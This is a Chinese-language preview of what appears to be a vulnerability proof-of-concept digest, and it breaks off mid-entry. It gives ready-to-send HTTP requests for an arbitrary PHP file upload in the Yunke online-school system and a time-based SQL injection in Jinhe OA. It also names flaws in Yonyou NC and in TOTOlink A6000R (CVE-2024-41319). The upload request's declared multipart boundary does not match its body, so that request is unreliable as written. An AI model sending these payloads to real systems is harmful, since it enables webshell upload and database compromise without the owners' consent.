文章预览
云课网校系统 uploadlmage 任意文件上传漏洞 POST /api/uploader/uploadImage HTTP/1.1 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m x-requested-with: XMLHttpRequest ------WebKitFormBoundaryLZbmKeasWgo2gPtU Content-Disposition: form-data; name="file"; filename="11.php" Content-Type: image/gif 111 ------WebKitFormBoundaryLZbmKeasWgo2gPtU-- 用友NC querygoodsgridbycode SQL注入漏洞 TOTOlink A6000R 命令执行漏洞(CVE-2024-41319) 金和OAC6GeneralXmlhttpPage.aspx SQL注入漏洞 GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralxmlhttpPage.aspx/?id =%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1 Host: 红海云eHRkqFile.mob 任
………………………………
